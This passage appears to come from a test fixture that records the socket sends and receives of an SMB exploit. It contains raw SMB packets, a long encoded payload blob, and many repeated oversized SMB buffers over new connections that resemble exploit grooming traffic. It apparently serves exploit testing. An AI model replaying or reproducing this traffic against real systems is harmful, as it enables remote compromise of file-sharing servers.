12XWrCgeKfCsyL7P1lDbC5hq1TQ7DBLberorm9rqvvRv2IkepTh2rTjfQk6Zios9dieq6ZiFemrwRmtvpJd4PcEQ4jccpuOFAjHMGisyHLrqKV9rdP4nzEEO79xX4ROZIpMXNMWxe3k0hYzxb8TwY1IgufxKVqbP4RQIHxWMMVmgzxYXOEhGuXgHttYwGtpyFECliqAulAYEJmy/VVl/AMfkoANrP1MjaHpgP1VCmQTrxW+19f0e1rda6HDDO9HoJzO7dbU/WKfHxV4FGwBp1tFY9WKX18W9pc1rOZqKNZe9dtKQ44Cp7QqUT8L1iuN7o5H7yN5bpIxljrCS/X+F8EHz1QlLPc99XW+iY0umLZK5ABm93iz517JaGI7oviUAmephhhTxpw7ZXIGcEzU2GF2jfoAZFgJyQ23IQkK8Lldhk+quhejzijWue/q2qFvywv34VNQ2uQRSspH9b4QaNlc3QHOSu0ZyWgl+pwn0I5pPo9IM8ywRTUyTNBQZiYQottLq7zy86jrMatDkNtTIpsZQ3lYH4E8Zg40Ny7j77wRVD+/5vCZtVFps+OupEvBMt9Zd5Cd9Ai4R5iZHYxFOcnnkjFZlRaPA9xUlFviGTcg4xvsh/e9CYOzDh66hrV1Njm0mKB1VOnZncnyhvpbYQKRC1HZkEeKnzRzv1J3Nm+MhWDZ5K5RRXs89Zf7rSBh34VOMt23PFErMrUdkRMXM1ymgfqpqmtHqlQl3H5N98o89BZfofLVR/aLqTRW\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xe3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x001\\\\xffSMB+\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\x01\\\\x01\\\\x00\\\\x0c\\\\x00JlJmIhClBsr\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('connect', 2, 0.0)\", \"('send', 2, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\x00@\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 2, 0.0)\", \"('send', 2, b'\\\\x00\\\\x00\\\\x00Q\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\x00@\\\\x00\\\\x0c\\\\xff\\\\x00\\\\x00\\\\x00\\\\x04\\\\x11\\\\n\\\\x00-\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x16\\\\x00\\\\xf0\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 2, 0.0)\", \"('connect', 3, 0.0)\", \"('connect', 4, 0.0)\", \"('send', 3, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 5, 0.0)\", \"('send', 4, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 5, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 6, 0.0)\", \"('send', 6, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 7, 0.0)\", \"('connect', 8, 0.0)\", \"('send', 7, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 8, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 9, 0.0)\", \"('connect', 10, 0.0)\", \"('send', 9, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 10, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 11, 0.0)\", \"('connect', 12, 0.0)\", \"('send', 11, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 13, 0.0)\", \"('send', 12, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 14, 0.0)\", \"('send', 13, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x